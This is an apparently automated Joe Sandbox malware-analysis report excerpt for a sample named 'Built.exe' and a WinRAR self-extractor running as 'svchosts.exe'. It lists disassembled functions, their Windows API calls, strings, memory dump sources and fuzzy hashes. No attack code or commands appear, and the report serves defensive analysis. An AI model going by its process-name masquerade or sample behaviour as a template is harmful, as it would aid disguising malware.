Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: File$ErrorHandleInformationLastNamedPeekPipeType
String ID:
API String ID: 2780335769-0
Opcode ID: 1ec8bf387a2241cb1ee0019bb6bb5a321e30a3d38cbcbe421edb0c1d83f6d5d9
Instruction ID: f51ffc6533edf02ab3b870bd225a4aa94235db5e943870c46a2de1ff293c5982
Opcode Fuzzy Hash: 1ec8bf387a2241cb1ee0019bb6bb5a321e30a3d38cbcbe421edb0c1d83f6d5d9
Instruction Fuzzy Hash: 0B519022A28641CAFB10EF71D4613BDA3A1EB5CB98F508135DE1957A9AEF38D4818734

Function 00007FF76D5C2030 Relevance: 6.1, APIs: 4, Instructions: 52COMMON

Download Yara Rule

APIs

EndDialog.USER32 ref: 00007FF76D5C2064
SetWindowLongPtrW.USER32 ref: 00007FF76D5C2086
GetWindowLongPtrW.USER32 ref: 00007FF76D5C20B0
InvalidateRect.USER32 ref: 00007FF76D5C20D0

Memory Dump Source

Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: LongWindow$DialogInvalidateRect
String ID:
API String ID: 1956198572-0
Opcode ID: 4b9e5de1fbcf843bc779a4d54dee57f94c26a540a6e6e96758728fc1cf1e39ca
Instruction ID: 80d1beb9ce618d1b8a3ef159b9948ece14119529072c8ea31644ced54649c984
Opcode Fuzzy Hash: 4b9e5de1fbcf843bc779a4d54dee57f94c26a540a6e6e96758728fc1cf1e39ca
Instruction Fuzzy Hash: DB118A21A2C242C1FB65BB5AE545379A252EF88B81FC49135DE4906F9BDD3DD4818930

Function 00007FF76D5E4E2C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF76D5E0A70: _invalid_parameter_noinfo.LIBCMT ref: 00007FF76D5E0AA3

_get_daylight.LIBCMT ref: 00007FF76D5E4F44
_get_daylight.LIBCMT ref: 00007FF76D5E4F55

Strings

?, xrefs: 00007FF76D5E4ED5

Memory Dump Source

Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: _get_daylight$_invalid_parameter_noinfo
String ID: ?
API String ID: 1286766494-1684325040
Opcode ID: 90ec7c2969ce35aee26a67d6175707cb0f81e8cc9ba484ad9fb4d69d3ee99291
Instruction ID: 5b24d7d7d8e1809f1cd3ac0a373fdfb3f1329f035c4cc1df6e93142e161c2ac6
Opcode Fuzzy Hash: 90ec7c2969ce35aee26a67d6175707cb0f81e8cc9ba484ad9fb4d69d3ee99291
Instruction Fuzzy Hash: 4E41D822A2C682C6FB64BB25941177AD750EF8DBA4F944235EE6C06ED6FF3CD4818710

Function 00007FF76D5D832C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF76D5D835E

Part of subcall function 00007FF76D5D9C58: RtlRestoreThreadPreferredUILanguages.NTDLL(?,?,?,00007FF76D5E2032,?,?,?,00007FF76D5E206F,?,?,00000000,00007FF76D5E2535,?,?,?,00007FF76D5E2467), ref: 00007FF76D5D9C6E
Part of subcall function 00007FF76D5D9C58: GetLastError.KERNEL32(?,?,?,00007FF76D5E2032,?,?,?,00007FF76D5E206F,?,?,00000000,00007FF76D5E2535,?,?,?,00007FF76D5E2467), ref: 00007FF76D5D9C78

GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF76D5CBEC5), ref: 00007FF76D5D837C

Strings

C:\Users\user\AppData\Local\Temp\Built.exe, xrefs: 00007FF76D5D836A

Memory Dump Source

Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: ErrorFileLanguagesLastModuleNamePreferredRestoreThread_invalid_parameter_noinfo
String ID: C:\Users\user\AppData\Local\Temp\Built.exe
API String ID: 2553983749-3074098987
Opcode ID: ddc46de6380418fe35fca5e4aa859368a8c2113199f78edf785cf6db79d8d493
Instruction ID: 4264282602f076345a22c95d98c3d56f1b3de88ff10150415223d461c1dbb03d
Opcode Fuzzy Hash: ddc46de6380418fe35fca5e4aa859368a8c2113199f78edf785cf6db79d8d493
Instruction Fuzzy Hash: B7419E32A2CA52C5E724FF2598611BCA794EB487C4B855035EE2D03B86EE3CE480C334

Function 00007FF76D5DF8E0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 105COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF76D5DF916

Part of subcall function 00007FF76D5DE8C8: GetCurrentDirectoryW.KERNEL32 ref: 00007FF76D5DE908

Strings

., xrefs: 00007FF76D5DF967
:, xrefs: 00007FF76D5DF956

Memory Dump Source

Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: CurrentDirectory_invalid_parameter_noinfo
String ID: .$:
API String ID: 2020911589-4202072812
Opcode ID: 02917ae70002487e25aaa57807b70e18839398bc457e7bd9011200fb9d4eab61
Instruction ID: c19752f57cbe9ee79995c92747ce3ed21da583478f41830398c3fbd6db95ee55
Opcode Fuzzy Hash: 02917ae70002487e25aaa57807b70e18839398bc457e7bd9011200fb9d4eab61
Instruction Fuzzy Hash: 97414F22F2C792D8FB10AFB198611BC66B4AF14758F940035DE6D67E4AFF3894428338

Function 00007FF76D5DBF48 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 00007FF76D5DC05F
GetLastError.KERNEL32 ref: 00007FF76D5DC081

Strings

U, xrefs: 00007FF76D5DC00B

Memory Dump Source

Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: 0b7df1583adeec31525a7cba2b12c3ee68d62bc9877546cbea7757f0bce6ed29
Instruction ID: 8949226114a8259f1576299f90932b75b5676a27dc11c1518bacbfa968f0e0db
Opcode Fuzzy Hash: 0b7df1583adeec31525a7cba2b12c3ee68d62bc9877546cbea7757f0bce6ed29
Instruction Fuzzy Hash: 7F41B122A2CA85C2DB20EF25E4543B9A761FB98794F844035EE4D87B99EF3CD441CB24

Function 00007FF76D5DE8C8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32 ref: 00007FF76D5DE908
GetCurrentDirectoryW.KERNEL32 ref: 00007FF76D5DE95A

Strings

:, xrefs: 00007FF76D5DE91E

Memory Dump Source

Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: CurrentDirectory
String ID: :
API String ID: 1611563598-336475711
Opcode ID: 07ccd8f192e8e90d69bfd843d23e6c5cb8c086d03a1c4ecf0d47480cab5f9335
Instruction ID: 8ca1a9c80e806dcee256bb8820287405bc43a9e0667ecde9db04dcbb594a0856
Opcode Fuzzy Hash: 07ccd8f192e8e90d69bfd843d23e6c5cb8c086d03a1c4ecf0d47480cab5f9335
Instruction Fuzzy Hash: 1B21C122A2C681C1EB60BF15D46427DE3A1FB88B44FC54035DE9C83A86EF7CE9458B75

Function 00007FF76D5CF068 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

RtlPcToFileHeader.KERNEL32 ref: 00007FF76D5CF0B8
RaiseException.KERNEL32 ref: 00007FF76D5CF0F9

Strings

csm, xrefs: 00007FF76D5CF0E6

Memory Dump Source

Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 353d784395b77eefcba7ec404c7e4e47dbaba59ece92a9373595b893a828088a
Instruction ID: 2208e2ca89cdb8591cc6fd828f02bf8c8e24d4a21ad73fb7a40a641dd933d887
Opcode Fuzzy Hash: 353d784395b77eefcba7ec404c7e4e47dbaba59ece92a9373595b893a828088a
Instruction Fuzzy Hash: D111493662DB8582EB219B15E440269B7E0FB88B89F984234DE8D07B69EF3CC5518B10

Function 00007FF76D5DFA4C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF76D5DFA7C
GetDriveTypeW.KERNEL32 ref: 00007FF76D5DFABC

Strings

:, xrefs: 00007FF76D5DFAA5

Memory Dump Source

Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: DriveType_invalid_parameter_noinfo
String ID: :
API String ID: 2595371189-336475711
Opcode ID: 229dc5225c97c31120184e1c5c073253f760aebc87e6502baf4f3d3b6f3e4c47
Instruction ID: 2ca4c2416d58bd2da2ab7b83c69facbe00a37a498a66a248d97292ae586a73ec
Opcode Fuzzy Hash: 229dc5225c97c31120184e1c5c073253f760aebc87e6502baf4f3d3b6f3e4c47
Instruction Fuzzy Hash: E401212192C246C6FB20BF64A47127EA2A0EF98748FC41035DD5D86A92FE7CD544CA39

Analysis Process: svchosts.exePID: 1436, Parent PID: 2596COMMON

Execution Graph

Execution Coverage:	9.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	4%
Total number of Nodes:	1481
Total number of Limit Nodes:	28

Executed Functions

Function 002AD5D4 Relevance: 42.2, APIs: 17, Strings: 7, Instructions: 197
filesleeptimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 002A00CF: GetModuleHandleW.KERNEL32(kernel32), ref: 002A00E4
Part of subcall function 002A00CF: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 002A00F6
Part of subcall function 002A00CF: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 002A0127

Part of subcall function 002A9DA4: GetCurrentDirectoryW.KERNEL32(?,?), ref: 002A9DAC

Part of subcall function 002AA335: OleInitialize.OLE32(00000000), ref: 002AA34E
Part of subcall function 002AA335: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 002AA385
Part of subcall function 002AA335: SHGetMalloc.SHELL32(002D8430), ref: 002AA38F

Part of subcall function 002A13B3: GetCPInfo.KERNEL32(00000000,?), ref: 002A13C4
Part of subcall function 002A13B3: IsDBCSLeadByte.KERNEL32(00000000), ref: 002A13D8

GetCommandLineW.KERNEL32 ref: 002AD61C
OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 002AD643
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 002AD654
UnmapViewOfFile.KERNEL32(00000000), ref: 002AD68E

Part of subcall function 002AD287: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 002AD29D
Part of subcall function 002AD287: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 002AD2D9

CloseHandle.KERNEL32(00000000), ref: 002AD697
GetModuleFileNameW.KERNEL32(00000000,002EDC90,00000800), ref: 002AD6B2
SetEnvironmentVariableW.KERNEL32(sfxname,002EDC90), ref: 002AD6BE
GetLocalTime.KERNEL32(?), ref: 002AD6C9
_swprintf.LIBCMT ref: 002AD708
SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 002AD71A
GetModuleHandleW.KERNEL32(00000000), ref: 002AD721
LoadIconW.USER32(00000000,00000064), ref: 002AD738
DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001AEE0,00000000), ref: 002AD789
Sleep.KERNEL32(?), ref: 002AD7B7
DeleteObject.GDI32 ref: 002AD7F0
DeleteObject.GDI32(?), ref: 002AD800
CloseHandle.KERNEL32 ref: 002AD843

Strings

C:\Users\user\Desktop, xrefs: 002AD5E9
STARTDLG, xrefs: 002AD77E
%4d-%02d-%02d-%02d-%02d-%02d-%03d, xrefs: 002AD6F9
sfxname, xrefs: 002AD6B9
xj., xrefs: 002AD7CB
winrarsfxmappingfile.tmp, xrefs: 002AD637
sfxstime, xrefs: 002AD715

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$ByteCommandCurrentDialogDirectoryGdiplusIconInfoInitializeLeadLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp$xj.
API String ID: 788466649-3260780516
Opcode ID: f0ca31b8a2df973adaf1c1d2db162805dadfddb0625c1895ecf6e066a23a9fe9
Instruction ID: 03e79aad8f0e7e10cb00bb6ce4691b7bd16c076b49c1edd15dd19888d7125019
Opcode Fuzzy Hash: f0ca31b8a2df973adaf1c1d2db162805dadfddb0625c1895ecf6e066a23a9fe9
Instruction Fuzzy Hash: A561D571960241AFD720AF75FC4DF2A37ACEB46744F00042AF546922A1DFB89D64CB61

Function 002A9E1C Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 100
memorywindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindResourceW.KERNEL32(002AAE4D,PNG,?,?,?,002AAE4D,00000066), ref: 002A9E2E
SizeofResource.KERNEL32(00000000,00000000,?,?,?,002AAE4D,00000066), ref: 002A9E46
LoadResource.KERNEL32(00000000,?,?,?,002AAE4D,00000066), ref: 002A9E59
LockResource.KERNEL32(00000000,?,?,?,002AAE4D,00000066), ref: 002A9E64
GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,002AAE4D,00000066), ref: 002A9E82
GlobalLock.KERNEL32(00000000,?,?,?,?,?,002AAE4D,00000066), ref: 002A9E93
GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 002A9EFC
GlobalUnlock.KERNEL32(00000000), ref: 002A9F1B
GlobalFree.KERNEL32(00000000), ref: 002A9F22

Strings

PNG, xrefs: 002A9E1F

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: GlobalResource$Lock$AllocBitmapCreateFindFreeFromGdipLoadSizeofUnlock
String ID: PNG
API String ID: 4097654274-364855578
Opcode ID: ba800453ff8154e0b42583a71051e5967caa84ca508ad68d9fc60464c79d3d48
Instruction ID: eee7a737e62a1c799d4eab6198a5434ca0b8eddc65b74750eba1b2ec6317af2e
Opcode Fuzzy Hash: ba800453ff8154e0b42583a71051e5967caa84ca508ad68d9fc60464c79d3d48
Instruction Fuzzy Hash: C7317071614706AFC7109F22EC4CE6BBBADFF86751B044919F906D2261EF72DC50CAA1

Function 0029A5F4 Relevance: 7.6, APIs: 5, Instructions: 107
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0029A4EF,000000FF,?,?), ref: 0029A628
FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,0029A4EF,000000FF,?,?), ref: 0029A65E
GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0029A4EF,000000FF,?,?), ref: 0029A66A
FindNextFileW.KERNEL32(?,?,?,?,?,?,0029A4EF,000000FF,?,?), ref: 0029A692
GetLastError.KERNEL32(?,?,?,?,0029A4EF,000000FF,?,?), ref: 0029A69E

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: FileFind$ErrorFirstLast$Next
String ID:
API String ID: 869497890-0
Opcode ID: 11284b9e44dc45152b507e2f188765de4d68ca9d21ea2e2b111091be7ae5dcd3
Instruction ID: 2c77768caab5feb91f6bdd80da4710356af3e35a157e65fea9f908d14a914742
Opcode Fuzzy Hash: 11284b9e44dc45152b507e2f188765de4d68ca9d21ea2e2b111091be7ae5dcd3
Instruction Fuzzy Hash: 07416172514342AFCB24EF68D984ADAF7ECBF49340F044A2AF599D3240D774A9648F92

Function 002B753D Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,?,002B7513,00000000,002CBAD8,0000000C,002B766A,00000000,00000002,00000000), ref: 002B755E
TerminateProcess.KERNEL32(00000000,?,002B7513,00000000,002CBAD8,0000000C,002B766A,00000000,00000002,00000000), ref: 002B7565
ExitProcess.KERNEL32 ref: 002B7577

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: a22a5697a9581eeab855d3fc80375d0251edf137a0378aae3b1bf77935ea27f7
Instruction ID: fa46538ba426d3fc36e1af92057b88111ccee697536ccb07ca6a1f68438b0477
Opcode Fuzzy Hash: a22a5697a9581eeab855d3fc80375d0251edf137a0378aae3b1bf77935ea27f7
Instruction Fuzzy Hash: 14E0BF31014548AFCF21EF68ED0DE893B69EB50781F508414FD454A122CB35DE52DB50

Function 0029857B Relevance: 3.9, APIs: 2, Instructions: 947COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00298580
_memcmp.LIBVCRUNTIME ref: 00298A08

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: H_prolog_memcmp
String ID:
API String ID: 3004599000-0
Opcode ID: 2a9c99d0797bf8332f868d1a58d81d13d666ad2e7268e9399d62c3c220f854be
Instruction ID: b900aceb23f3d8c4c6643383be39dee96561699f3f6a1db9229a813af8c9c7b7
Opcode Fuzzy Hash: 2a9c99d0797bf8332f868d1a58d81d13d666ad2e7268e9399d62c3c220f854be
Instruction Fuzzy Hash: 3B820C70924246AEDF25DF74C495BFEB7A9BF16300F0C40BAEC599B142DB315AA4CB60

Function 002AAEE0 Relevance: 98.7, APIs: 47, Strings: 9, Instructions: 724COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 002AAEE5

Part of subcall function 0029130B: GetDlgItem.USER32(00000000,00003021), ref: 0029134F
Part of subcall function 0029130B: SetWindowTextW.USER32(00000000,002C35B4), ref: 00291365

Strings

LICENSEDLG, xrefs: 002AB771
C:\Users\user\Desktop, xrefs: 002AB2DF
"%s"%s, xrefs: 002AB423
STARTDLG, xrefs: 002AAF04
<, xrefs: 002AB29A
@, xrefs: 002AB2A7
__tmp_rar_sfx_access_check_%u, xrefs: 002AB1CB
winrarsfxmappingfile.tmp, xrefs: 002AB2BC
-el -s2 "-d%s" "-sp%s", xrefs: 002AB281

Memory Dump Source

Source File: 00000002.00000002.1708981230.0000000000291000.00000020.00000001.01000000.00000006.sdmp, Offset: 00290000, based on PE: true

Associated: 00000002.00000002.1708953427.0000000000290000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709016713.00000000002C3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002CE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002D4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709040853.00000000002F1000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1709119162.00000000002F2000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_290000_svchosts.jbxd

Similarity

API ID: H_prologItemTextWindow
String ID: "%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
API String ID: 810644672-8108337
Opcode ID: 9f51e7e858960b62129bb13e962c6d198daddb66f61ed4d0eadf543761e42d9c
Instruction ID: 22b91489c12eec02a19a189e8659da8c01c86ad40e26660742d62a7499ddc0ed
Opcode Fuzzy Hash: 9f51e7e858960b62129bb13e962c6d198daddb66f61ed4d0eadf543761e42d9c
